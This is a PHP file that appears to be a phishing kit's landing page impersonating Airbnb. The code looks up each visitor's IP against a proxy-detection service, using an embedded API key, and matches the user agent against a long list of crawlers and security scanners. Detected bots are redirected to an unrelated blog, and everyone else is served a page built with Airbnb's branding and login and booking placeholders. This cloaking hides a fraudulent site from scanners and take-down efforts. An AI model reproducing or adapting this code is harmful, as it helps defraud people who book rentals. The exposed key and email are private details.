<?php
function getUserIP()
{
    if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
              $_SERVER['REMOTE_ADDR'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
              $_SERVER['HTTP_CLIENT_IP'] = $_SERVER["HTTP_CF_CONNECTING_IP"];
    }
    $client  = @$_SERVER['HTTP_CLIENT_IP'];
    $forward = @$_SERVER['HTTP_X_FORWARDED_FOR'];
    $remote  = $_SERVER['REMOTE_ADDR'];

    if(filter_var($client, FILTER_VALIDATE_IP))
    {
        $ip = $client;
    }
    elseif(filter_var($forward, FILTER_VALIDATE_IP))
    {
        $ip = $forward;
    }
    else
    {
        $ip = $remote;
    }

    return $ip;
}

function getcurl($url, $h = false) {
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    if($h) {
        curl_setopt($curl, CURLOPT_HTTPHEADER, [
            'X-Key: MjE0ODU6Y0oxdkllT2dYNVlWMHF5VUtpd3BwWlNCUkZzQldFdXk='
        ]);
    } else {
        curl_setopt($curl, CURLOPT_HEADER, false);
    }
    
    $data = curl_exec($curl);
    curl_close($curl);

    return $data;
}

function getIntel($ip) {
    $get = getcurl("http://check.getipintel.net/check.php?ip={$ip}&contact=sugin223pl@gmail.com&format=json&flags=m");
    return json_decode($get);
}
function getIntel2($ip) {
    $get = getcurl("https://v2.api.iphub.info/ip/{$ip}", true);
    return json_decode($get);
}
function is_bot($sistema = null) {
        if($sistema == null) {
            $sistema = @$_SERVER['HTTP_USER_AGENT'];
        }
    // bots de buscadores
       $bots = array(
            'Googlebot'
           , 'Baiduspider'
           , 'ia_archiver'
           , 'R6_FeedFetcher'
           , 'NetcraftSurveyAgent'
           , 'Sogou web spider'
           , 'bingbot'
           , 'Yahoo! Slurp'
           , 'facebookexternalhit'
           , 'PrintfulBot'
           , 'msnbot'
           , 'Twitterbot'
           , 'UnwindFetchor'
           , 'urlresolver'
           , 'Butterfly'
           , 'TweetmemeBot'
           , 'PaperLiBot'
           , 'MJ12bot'
           , 'AhrefsBot'
           , 'Exabot'
           , 'Ezooms'
           , 'YandexBot'
           , 'SearchmetricsBot'
           , 'picsearch'
           , 'TweetedTimes Bot'
           , 'QuerySeekerSpider'
           , 'ShowyouBot'
           , 'woriobot'
           , 'merlinkbot'
           , 'BazQuxBot'
           , 'Kraken'
           , 'SISTRIX Crawler'
           , 'R6_CommentReader'
           , 'magpie-crawler'
           , 'GrapeshotCrawler'
           , 'PercolateCrawler'
           , 'MaxPointCrawler'
           , 'R6_FeedFetcher'
           , 'NetSeer crawler'
           , 'grokkit-crawler'
           , 'SMXCrawler'
           , 'PulseCrawler'
           , 'Y!J-BRW'
           , '80legs'
           , 'Mediapartners-Google'
           , 'Spinn3r'
           , 'InAGist'
           , 'Python-urllib'
           , 'NING'
           , 'TencentTraveler'
           , 'Feedfetcher-Google'
           , 'mon.itor.us'
           , 'spbot'
           , 'Feedly'
           , 'bitlybot'
           , 'ADmantX'
           , 'Niki-Bot'
           , 'Pinterest'
           , 'python-requests'
           , 'DotBot'
           , 'HTTP_Request2'
           , 'linkdexbot'
           , 'A6-Indexer'
           , 'Baiduspider'
           , 'TwitterFeed'
           , 'Microsoft Office'
           , 'Pingdom'
           , 'BTWebClient'
           , 'KatBot'
           , 'SiteCheck'
           , 'proximic'
           , 'Sleuth'
           , 'Abonti'
           , '(BOT for JCE)'
           , 'Baidu'
           , 'Tiny Tiny RSS'
           , 'newsblur'
           , 'updown_tester'
           , 'linkdex'
           , 'baidu'
           , 'searchmetrics'
           , 'genieo'
           , 'majestic12'
           , 'spinn3r'
           , 'profound'
           , 'domainappender'
           , 'VegeBot'
           , 'terrykyleseoagency.com'
           , 'CommonCrawler Node'
           , 'AdlesseBot'
           , 'metauri.com'
           , 'libwww-perl'
           , 'rogerbot-crawler'
           , 'MegaIndex.ru'
           , 'ltx71'
           , 'Qwantify'
           , 'Traackr.com'
           , 'Re-Animator Bot'
           , 'Pcore-HTTP'
           , 'BoardReader'
           , 'omgili'
           , 'okhttp'
           , 'CCBot'
           , 'Java/1.8'
           , 'semrush.com'
           , 'feedbot'
           , 'CommonCrawler'
           , 'AdlesseBot'
           , 'MetaURI'
           , 'ibwww-perl'
           , 'rogerbot'
           , 'MegaIndex'
           , 'BLEXBot'
           , 'FlipboardProxy'
           , 'techinfo@ubermetrics-technologies.com'
           , 'trendictionbot'
           , 'Mediatoolkitbot'
           , 'trendiction'
           , 'ubermetrics'
           , 'ScooperBot'
           , 'TrendsmapResolver'
           , 'Nuzzel'
           , 'Go-http-client'
           , 'Applebot'
           , 'LivelapBot'
           , 'GroupHigh'
           , 'SemrushBot'
           , 'ltx71'
           , 'commoncrawl'
           , 'istellabot'
           , 'DomainCrawler'
           , 'cs.daum.net'
           , 'StormCrawler'
           , 'GarlikCrawler'
           , 'The Knowledge AI'
           , 'getstream.io/winds'
           , 'YisouSpider'
           , 'archive.org_bot'
           , 'semantic-visions.com'
           , 'FemtosearchBot'
           , '360Spider'
           , 'linkfluence.com'
           , 'glutenfreepleasure.com'
           , 'Gluten Free Crawler'
           , 'YaK/1.0'
           , 'Cliqzbot'
           , 'app.hypefactors.com'
           , 'axios'
           , 'semantic-visions.com'
           , 'webdatastats.com'
           , 'schmorp.de'
           , 'SEOkicks'
           , 'DuckDuckBot'
           , 'Barkrowler'
           , 'ZoominfoBot'
           , 'Linguee Bot'
           , 'Mail.RU_Bot'
           , 'OnalyticaBot'
           , 'Linguee Bot'
           , 'admantx-adform'
           , 'Buck/2.2'
           , 'Barkrowler'
           , 'Zombiebot'
           , 'Nutch'
           , 'SemanticScholarBot'
           , 'Jetslide'
           , 'scalaj-http'
           , 'XoviBot'
           , 'sysomos.com'
           , 'PocketParser'
           , 'newspaper'
           , 'serpstatbot'
           , 'MetaJobBot'
           , 'SeznamBot/3.2'
           , 'VelenPublicWebCrawler/1.0'
           , 'WordPress.com mShots'
           , 'adscanner'
           , 'BacklinkCrawler'
           , 'netEstate NE Crawler'
           , 'Astute SRM'
           , 'GigablastOpenSource/1.0'
           , 'DomainStatsBot'
           , 'Winds: Open Source RSS & Podcast'
           , 'dlvr.it'
           , 'BehloolBot'
           , '7Siters'
           , 'AwarioSmartBot'
           , 'Apache-HttpClient/5'
           , 'Seekport Crawler'
           , 'AHC/2.1'
           , 'eCairn-Grabber'
           , 'mediawords bot'
           , 'PHP-Curl-Class'
           , 'Scrapy'
           , 'curl/7'
           , 'Blackboard'
           , 'NetNewsWire'
           , 'node-fetch'
           , 'admantx'
           , 'metadataparser'
           , 'Domains Project'
           , 'SerendeputyBot'
           , 'Moreover'
           , 'DuckDuckGo' 
           , 'monitoring-plugins'
           , 'Selfoss'
           , 'Adsbot'
           , 'acebookexternalhit'
           , 'SpiderLing'
           , 'Cocolyzebot'
           , 'AhrefsBot'
           , 'TTD-Content'
           , 'superfeedr'
           , 'Twingly'
           , 'Google-Apps-Scrip'
           , 'LinkpadBot'
           , 'CensysInspect'
           , 'Reeder'
           , 'tweetedtimes'
           , 'Amazonbot'
           , 'MauiBot'
           , 'Symfony BrowserKit'
           , 'DataForSeoBot'
           , 'GoogleProducer'
           , 'TinEye-bot-live'
           , 'sindresorhus/got'
           , 'CriteoBot'
           , 'Down/5'
           , 'Yahoo Ad monitoring'
           , 'MetaInspector'
           , 'PetalBot'
           , 'MetadataScraper'
           , 'Cloudflare SpeedTest'
           , 'CriteoBot'
           , 'aiohttp'
           , 'AppEngine-Google'
           , 'heritrix'
           , 'sqlmap'
           , 'Buck'
           , 'MJ12bot'
           , 'wp_is_mobile'
           , 'SerendeputyBot'
           , '01h4x.com'
           , '404checker'
           , '404enemy'
           , 'AIBOT'
           , 'ALittle Client'
           , 'ASPSeek'
           , 'Aboundex'
           , 'Acunetix'
           , 'AfD-Verbotsverfahren'
           , 'AiHitBot'
           , 'Aipbot'
           , 'Alexibot'
           , 'AllSubmitter'
           , 'Alligator'
           , 'AlphaBot'
           , 'Anarchie'
           , 'Anarchy'
           , 'Anarchy99'
           , 'Ankit'
           , 'Anthill'
           , 'Apexoo'
           , 'Aspiegel'
           , 'Asterias'
           , 'Atomseobot'
           , 'Attach'
           , 'AwarioRssBot'
           , 'BBBike'
           , 'BDCbot'
           , 'BDFetch'
           , 'BackDoorBot'
           , 'BackStreet'
           , 'BackWeb'
           , 'Backlink-Ceck'
           , 'BacklinkCrawler'
           , 'Badass'
           , 'Bandit'
           , 'Barkrowler'
           , 'BatchFTP'
           , 'Battleztar Bazinga'
           , 'BetaBot'
           , 'Bigfoot'
           , 'Bitacle'
           , 'BlackWidow'
           , 'Black Hole'
           , 'Blackboard'
           , 'Blow'
           , 'BlowFish'
           , 'Boardreader'
           , 'Bolt'
           , 'BotALot'
           , 'Brandprotect'
           , 'Brandwatch'
           , 'Buck'
           , 'Buddy'
           , 'BuiltBotTough'
           , 'BuiltWith'
           , 'Bullseye'
           , 'BunnySlippers'
           , 'BuzzSumo'
           , 'CATExplorador'
           , 'CCBot'
           , 'CODE87'
           , 'CSHttp'
           , 'Calculon'
           , 'CazoodleBot'
           , 'Cegbfeieh'
           , 'CensysInspect'
           , 'CheTeam'
           , 'CheeseBot'
           , 'CherryPicker'
           , 'ChinaClaw'
           , 'Chlooe'
           , 'Citoid'
           , 'Claritybot'
           , 'Cliqzbot'
           , 'Cloud mapping'
           , 'Cocolyzebot'
           , 'Cogentbot'
           , 'Collector'
           , 'Copier'
           , 'CopyRightCheck'
           , 'Copyscape'
           , 'Cosmos'
           , 'Craftbot'
           , 'Crawling at Home Project'
           , 'CrazyWebCrawler'
           , 'Crescent'
           , 'CrunchBot'
           , 'Curious'
           , 'Custo'
           , 'CyotekWebCopy'
           , 'DBLBot'
           , 'DIIbot'
           , 'DSearch'
           , 'DTS Agent'
           , 'DataCha0s'
           , 'DatabaseDriverMysqli'
           , 'Demon'
           , 'Deusu'
           , 'Devil'
           , 'Digincore'
           , 'DigitalPebble'
           , 'Dirbuster'
           , 'Disco'
           , 'Discobot'
           , 'Discoverybot'
           , 'Dispatch'
           , 'DittoSpyder'
           , 'DnBCrawler-Analytics'
           , 'DnyzBot'
           , 'DomCopBot'
           , 'DomainAppender'
           , 'DomainCrawler'
           , 'DomainSigmaCrawler'
           , 'DomainStatsBot'
           , 'Domains Project'
           , 'Dotbot'
           , 'Download Wonder'
           , 'Dragonfly'
           , 'Drip'
           , 'ECCP/1.0'
           , 'EMail Siphon'
           , 'EMail Wolf'
           , 'EasyDL'
           , 'Ebingbong'
           , 'Ecxi'
           , 'EirGrabber'
           , 'EroCrawler'
           , 'Evil'
           , 'Exabot'
           , 'Express WebPictures'
           , 'ExtLinksBot'
           , 'Extractor'
           , 'ExtractorPro'
           , 'Extreme Picture Finder'
           , 'EyeNetIE'
           , 'Ezooms'
           , 'FDM'
           , 'FHscan'
           , 'FemtosearchBot'
           , 'Fimap'
           , 'Firefox/7.0'
           , 'FlashGet'
           , 'Flunky'
           , 'Foobot'
           , 'Freeuploader'
           , 'FrontPage'
           , 'Fuzz'
           , 'FyberSpider'
           , 'Fyrebot'
           , 'G-i-g-a-b-o-t'
           , 'GT::WWW'
           , 'GalaxyBot'
           , 'Genieo'
           , 'GermCrawler'
           , 'GetRight'
           , 'GetWeb'
           , 'Getintent'
           , 'Gigabot'
           , 'Go!Zilla'
           , 'Go-Ahead-Got-It'
           , 'GoZilla'
           , 'Gotit'
           , 'GrabNet'
           , 'Grabber'
           , 'Grafula'
           , 'GrapeFX'
           , 'GrapeshotCrawler'
           , 'GridBot'
           , 'HEADMasterSEO'
           , 'HMView'
           , 'HTMLparser'
           , 'HTTP::Lite'
           , 'HTTrack'
           , 'Haansoft'
           , 'HaosouSpider'
           , 'Harvest'
           , 'Havij'
           , 'Heritrix'
           , 'Hloader'
           , 'HonoluluBot'
           , 'Humanlinks'
           , 'HybridBot'
           , 'IDBTE4M'
           , 'IDBot'
           , 'IRLbot'
           , 'Iblog'
           , 'Id-search'
           , 'IlseBot'
           , 'Image Fetch'
           , 'Image Sucker'
           , 'IndeedBot'
           , 'Indy Library'
           , 'InfoNaviRobot'
           , 'InfoTekies'
           , 'Intelliseek'
           , 'InterGET'
           , 'InternetSeer'
           , 'Internet Ninja'
           , 'Iria'
           , 'Iskanie'
           , 'IstellaBot'
           , 'JOC Web Spider'
           , 'JamesBOT'
           , 'Jbrofuzz'
           , 'JennyBot'
           , 'JetCar'
           , 'Jetty'
           , 'JikeSpider'
           , 'Joomla'
           , 'Jorgee'
           , 'JustView'
           , 'Jyxobot'
           , 'Kenjin Spider'
           , 'Keybot Translation-Search-Machine'
           , 'Keyword Density'
           , 'Kinza'
           , 'Kozmosbot'
           , 'LNSpiderguy'
           , 'LWP::Simple'
           , 'Lanshanbot'
           , 'Larbin'
           , 'Leap'
           , 'LeechFTP'
           , 'LeechGet'
           , 'LexiBot'
           , 'Lftp'
           , 'LibWeb'
           , 'Libwhisker'
           , 'LieBaoFast'
           , 'Lightspeedsystems'
           , 'Likse'
           , 'LinkScan'
           , 'LinkWalker'
           , 'Linkbot'
           , 'LinkextractorPro'
           , 'LinkpadBot'
           , 'LinksManager'
           , 'LinqiaMetadataDownloaderBot'
           , 'LinqiaRSSBot'
           , 'LinqiaScrapeBot'
           , 'Lipperhey'
           , 'Lipperhey Spider'
           , 'Litemage_walker'
           , 'Lmspider'
           , 'Ltx71'
           , 'MFC_Tear_Sample'
           , 'MIDown tool'
           , 'MIIxpc'
           , 'MJ12bot'
           , 'MQQBrowser'
           , 'MSFrontPage'
           , 'MSIECrawler'
           , 'MTRobot'
           , 'Mag-Net'
           , 'Magnet'
           , 'Mail.RU_Bot'
           , 'Majestic-SEO'
           , 'Majestic12'
           , 'Majestic SEO'
           , 'MarkMonitor'
           , 'MarkWatch'
           , 'Mass Downloader'
           , 'Masscan'
           , 'Mata Hari'
           , 'MauiBot'
           , 'Mb2345Browser'
           , 'MeanPath Bot'
           , 'Meanpathbot'
           , 'Mediatoolkitbot'
           , 'MegaIndex.ru'
           , 'Metauri'
           , 'MicroMessenger'
           , 'Microsoft Data Access'
           , 'Microsoft URL Control'
           , 'Minefield'
           , 'Mister PiX'
           , 'Moblie Safari'
           , 'Mojeek'
           , 'Mojolicious'
           , 'MolokaiBot'
           , 'Morfeus Fucking Scanner'
           , 'Mozlila'
           , 'Mr.4x3'
           , 'Msrabot'
           , 'Musobot'
           , 'NICErsPRO'
           , 'NPbot'
           , 'Name Intelligence'
           , 'Nameprotect'
           , 'Navroad'
           , 'NearSite'
           , 'Needle'
           , 'Nessus'
           , 'NetAnts'
           , 'NetLyzer'
           , 'NetMechanic'
           , 'NetSpider'
           , 'NetZIP'
           , 'Net Vampire'
           , 'Netcraft'
           , 'Nettrack'
           , 'Netvibes'
           , 'NextGenSearchBot'
           , 'Nibbler'
           , 'Niki-bot'
           , 'Nikto'
           , 'NimbleCrawler'
           , 'Nimbostratus'
           , 'Ninja'
           , 'Nmap'
           , 'Not'
           , 'Nuclei'
           , 'Nutch'
           , 'Octopus'
           , 'Offline Explorer'
           , 'Offline Navigator'
           , 'OnCrawl'
           , 'OpenLinkProfiler'
           , 'OpenVAS'
           , 'Openfind'
           , 'Openvas'
           , 'OrangeBot'
           , 'OrangeSpider'
           , 'OutclicksBot'
           , 'OutfoxBot'
           , 'PECL::HTTP'
           , 'PHPCrawl'
           , 'POE-Component-Client-HTTP'
           , 'PageAnalyzer'
           , 'PageGrabber'
           , 'PageScorer'
           , 'PageThing.com'
           , 'Page Analyzer'
           , 'Pandalytics'
           , 'Panscient'
           , 'Papa Foto'
           , 'Pavuk'
           , 'PeoplePal'
           , 'Petalbot'
           , 'Pi-Monster'
           , 'Picscout'
           , 'Picsearch'
           , 'PictureFinder'
           , 'Piepmatz'
           , 'Pimonster'
           , 'Pixray'
           , 'PleaseCrawl'
           , 'Pockey'
           , 'ProPowerBot'
           , 'ProWebWalker'
           , 'Probethenet'
           , 'Psbot'
           , 'Pu_iN'
           , 'Pump'
           , 'PxBroker'
           , 'PyCurl'
           , 'QueryN Metasearch'
           , 'Quick-Crawler'
           , 'RSSingBot'
           , 'RankActive'
           , 'RankActiveLinkBot'
           , 'RankFlex'
           , 'RankingBot'
           , 'RankingBot2'
           , 'Rankivabot'
           , 'RankurBot'
           , 'Re-re'
           , 'ReGet'
           , 'RealDownload'
           , 'Reaper'
           , 'RebelMouse'
           , 'Recorder'
           , 'RedesScrapy'
           , 'RepoMonkey'
           , 'Ripper'
           , 'RocketCrawler'
           , 'Rogerbot'
           , 'SBIder'
           , 'SEOkicks'
           , 'SEOkicks-Robot'
           , 'SEOlyticsCrawler'
           , 'SEOprofiler'
           , 'SEOstats'
           , 'SISTRIX'
           , 'SMTBot'
           , 'SalesIntelligent'
           , 'ScanAlert'
           , 'Scanbot'
           , 'ScoutJet'
           , 'Scrapy'
           , 'Screaming'
           , 'ScreenerBot'
           , 'ScrepyBot'
           , 'Searchestate'
           , 'SearchmetricsBot'
           , 'Seekport'
           , 'SemanticJuice'
           , 'Semrush'
           , 'SemrushBot'
           , 'SentiBot'
           , 'SeoSiteCheckup'
           , 'SeobilityBot'
           , 'Seomoz'
           , 'Shodan'
           , 'Siphon'
           , 'SiteCheckerBotCrawler'
           , 'SiteExplorer'
           , 'SiteLockSpider'
           , 'SiteSnagger'
           , 'SiteSucker'
           , 'Site Sucker'
           , 'Sitebeam'
           , 'Siteimprove'
           , 'Sitevigil'
           , 'SlySearch'
           , 'SmartDownload'
           , 'Snake'
           , 'Snapbot'
           , 'Snoopy'
           , 'SocialRankIOBot'
           , 'Sociscraper'
           , 'Sogou web spider'
           , 'Sosospider'
           , 'Sottopop'
           , 'SpaceBison'
           , 'Spammen'
           , 'SpankBot'
           , 'Spanner'
           , 'Spbot'
           , 'Spinn3r'
           , 'SputnikBot'
           , 'Sqlmap'
           , 'Sqlworm'
           , 'Sqworm'
           , 'Steeler'
           , 'Stripper'
           , 'Sucker'
           , 'Sucuri'
           , 'SuperBot'
           , 'SuperHTTP'
           , 'Surfbot'
           , 'SurveyBot'
           , 'Suzuran'
           , 'Swiftbot'
           , 'Szukacz'
           , 'T0PHackTeam'
           , 'T8Abot'
           , 'Teleport'
           , 'TeleportPro'
           , 'Telesoft'
           , 'Telesphoreo'
           , 'Telesphorep'
           , 'TheNomad'
           , 'The Intraformant'
           , 'Thumbor'
           , 'TightTwatBot'
           , 'Titan'
           , 'Toata'
           , 'Toweyabot'
           , 'Tracemyfile'
           , 'Trendiction'
           , 'Trendictionbot'
           , 'True_Robot'
           , 'Turingos'
           , 'Turnitin'
           , 'TurnitinBot'
           , 'TwengaBot'
           , 'Twice'
           , 'Typhoeus'
           , 'URLy.Warning'
           , 'URLy Warning'
           , 'UnisterBot'
           , 'Upflow'
           , 'V-BOT'
           , 'VB Project'
           , 'VCI'
           , 'Vacuum'
           , 'Vagabondo'
           , 'VelenPublicWebCrawler'
           , 'VeriCiteCrawler'
           , 'VidibleScraper'
           , 'Virusdie'
           , 'VoidEYE'
           , 'Voil'
           , 'Voltron'
           , 'WASALive-Bot'
           , 'WBSearchBot'
           , 'WEBDAV'
           , 'WISENutbot'
           , 'WPScan'
           , 'WWW-Collector-E'
           , 'WWW-Mechanize'
           , 'WWW::Mechanize'
           , 'WWWOFFLE'
           , 'Wallpapers'
           , 'Wallpapers/3.0'
           , 'WallpapersHD'
           , 'WeSEE'
           , 'WebAuto'
           , 'WebBandit'
           , 'WebCollage'
           , 'WebCopier'
           , 'WebEnhancer'
           , 'WebFetch'
           , 'WebFuck'
           , 'WebGo IS'
           , 'WebImageCollector'
           , 'WebLeacher'
           , 'WebPix'
           , 'WebReaper'
           , 'WebSauger'
           , 'WebStripper'
           , 'WebSucker'
           , 'WebWhacker'
           , 'WebZIP'
           , 'Web Auto'
           , 'Web Collage'
           , 'Web Enhancer'
           , 'Web Fetch'
           , 'Web Fuck'
           , 'Web Pix'
           , 'Web Sauger'
           , 'Web Sucker'
           , 'Webalta'
           , 'WebmasterWorldForumBot'
           , 'Webshag'
           , 'WebsiteExtractor'
           , 'WebsiteQuester'
           , 'Website Quester'
           , 'Webster'
           , 'Whack'
           , 'Whacker'
           , 'Whatweb'
           , 'Who.is Bot'
           , 'Widow'
           , 'WinHTTrack'
           , 'WiseGuys Robot'
           , 'Wonderbot'
           , 'Woobot'
           , 'Wotbox'
           , 'Wprecon'
           , 'Xaldon WebSpider'
           , 'Xaldon_WebSpider'
           , 'Xenu'
           , 'YoudaoBot'
           , 'Zade'
           , 'Zauba'
           , 'Zermelo'
           , 'Zeus'
           , 'Zitebot'
           , 'ZmEu'
           , 'ZoomBot'
           , 'ZoominfoBot'
           , 'ZumBot'
           , 'ZyBorg'
           , 'adscanner'
           , 'archive.org_bot'
           , 'arquivo-web-crawler'
           , 'arquivo.pt'
           , 'autoemailspider'
           , 'backlink-check'
           , 'cah.io.community'
           , 'check1.exe'
           , 'clark-crawler'
           , 'coccocbot'
           , 'cognitiveseo'
           , 'com.plumanalytics'
           , 'crawl.sogou.com'
           , 'crawler.feedback'
           , 'crawler4j'
           , 'dataforseo.com'
           , 'demandbase-bot'
           , 'domainsproject.org'
           , 'eCatch'
           , 'evc-batch'
           , 'facebookscraper'
           , 'gopher'
           , 'heritrix'
           , 'instabid'
           , 'internetVista monitor'
           , 'ips-agent'
           , 'isitwp.com'
           , 'iubenda-radar'
           , 'linkdexbot'
           , 'lwp-request'
           , 'lwp-trivial'
           , 'magpie-crawler'
           , 'meanpathbot'
           , 'mediawords'
           , 'muhstik-scan'
           , 'netEstate NE Crawler'
           , 'oBot'
           , 'page scorer'
           , 'pcBrowser'
           , 'plumanalytics'
           , 'polaris version'
           , 'probe-image-size'
           , 'ripz'
           , 's1z.ru'
           , 'satoristudio.net'
           , 'scalaj-http'
           , 'scan.lol'
           , 'seobility'
           , 'seocompany.store'
           , 'seoscanners'
           , 'seostar'
           , 'serpstatbot'
           , 'sexsearcher'
           , 'sitechecker.pro'
           , 'siteripz'
           , 'sogouspider'
           , 'sp_auditbot'
           , 'spyfu'
           , 'sysscan'
           , 'tAkeOut'
           , 'trendiction.com'
           , 'trendiction.de'
           , 'ubermetrics-technologies.com'
           , 'voyagerx.com'
           , 'webgains-bot'
           , 'webmeup-crawler'
           , 'webpros.com'
           , 'webprosbot'
           , 'x09Mozilla'
           , 'x22Mozilla'
           , 'xpymep1.exe'
           , 'zauba.io'
           , 'zgrab'
           , 'petalsearch'        
           , 'protopage'
           , 'Miniflux'
           , 'Feeder'
           , 'Semanticbot' 
           , 'ImageFetcher'
           , 'Mastodon' 
           , 'Neevabot'
           , 'Pleroma'
           , 'Akkoma'
           , 'koyu.space'
           , 'Embedly'
           , 'Mjukisbyxor'        
           , 'Giant Rhubarb'
           , 'GozleBot'
           , 'Friendica'
           , 'WhatsApp'
           , 'XenForo'        
           , 'Yeti'
           , 'MuckRack'
           );
   
    // si lo encuentra devuelve true, si no, false
       foreach($bots as $b)
           {
               if( stripos( $sistema, $b ) !== false ) return 1;
           }
       return 0;
}

$userip = getUserIP();

if($userip == '127.0.0.1') {
    $userip = '104.28.106.146';
}

$check = getIntel2($userip);
$check->bot = is_bot();

if(isset($check->bot) && $check->bot == 1 || isset($check->block) && $check->block == 1) {
    header("Location: https://www.lodgify.com/blog/airbnb-blogs/", true, 302);
} else { ?>
<!doctype html><html data-is-hyperloop="true" lang="en" dir="ltr" xmlns:fb="http://ogp.me/ns/fb#" class="js-focus-visible"><head><title>Airbnb :: Premium</title><meta charset="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><link rel="dns-prefetch" href="https://res.cloudinary.com"><link rel="prefetch" type="font/woff2" as="font" href="//res.cloudinary.com/dguu5sqgh/raw/upload/v1614203122/vue-cli/fonts/renamed/Airbnb_Cereal-Bold.woff2"><link rel="prefetch" type="font/woff2" as="font" href="//res.cloudinary.com/dguu5sqgh/raw/upload/v1614203122/vue-cli/fonts/renamed/Airbnb_Cereal-Book.woff2"><link rel="prefetch" type="font/woff2" as="font" href="//res.cloudinary.com/dguu5sqgh/raw/upload/v1614203122/vue-cli/fonts/renamed/Airbnb_Cereal-Medium.woff2"><link rel="prefetch" type="font/woff2" as="font" href="//res.cloudinary.com/dguu5sqgh/raw/upload/v1614203122/vue-cli/fonts/renamed/airmojix-Regular.woff2"><meta name="robots" content="noindex"/><meta name="description" content="Vacation Rentals, Homes, Experiences & Places - Airbnb"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="theme-color" content="#FF385C"/><meta name="msapplication-TileColor" content="#FF385C"><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-status-bar-style" content="default"/><meta name="apple-mobile-web-app-title" content="Airbnb"/><!--[if IE]><link rel="icon" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1671564012/vue-cli/icons/favicon.ico"/><![endif]--><link rel="mask-icon" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/safari-pinned-tab.svg.svg" color="#FF385C"/><script defer="defer" src="/js/chunk-vendors.43218b14.js"></script><script defer="defer" src="/js/app.c9231e5e.js"></script><link href="/css/app.314efd77.css" rel="stylesheet"><link rel="icon" type="image/png" sizes="32x32" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/favicon.ico"><link rel="icon" type="image/png" sizes="16x16" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/favicon-16x16.png"><link rel="manifest" href="/manifest.json"><meta name="theme-color" content="#4DBA87"><meta name="apple-mobile-web-app-capable" content="no"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="apple-mobile-web-app-title" content="airbnb"><link rel="apple-touch-icon" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/apple-touch-icon.png"><link rel="mask-icon" href="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/safari-pinned-tab.svg.svg" color="#4DBA87"><meta name="msapplication-TileImage" content="https://res.cloudinary.com/dguu5sqgh/image/upload/v1614355069/vue-cli/img/icons/msapplication-icon-144x144.png"><meta name="msapplication-TileColor" content="#000000"></head><body class="with-new-header" data-swipe-threshold="20" data-swipe-timeout="500" data-swipe-ignore="false"><noscript><div class="alert alert-with-icon alert-error no-js-alert" data-nosnippet="true"><i class="icon alert-icon icon-alert-alt"></i> We’re sorry, some parts of the Airbnb website don’t work properly without JavaScript enabled.</div></noscript><div id="app"></div><div dir="ltr" id="bookingConfirmation"></div><div dir="ltr" id="modalPlaceholder"></div><div dir="ltr" id="mobileCalendar"></div><div dir="ltr" id="mobileGuestsModal"></div><div dir="ltr" id="mobileBreakdown"></div><div dir="ltr" id="authLogin"></div><script src="//code.tidio.co/bjqsl7rg6qoczcw4sspgoekhspz77dtn.js" async></script></body></html>
<?php } ?>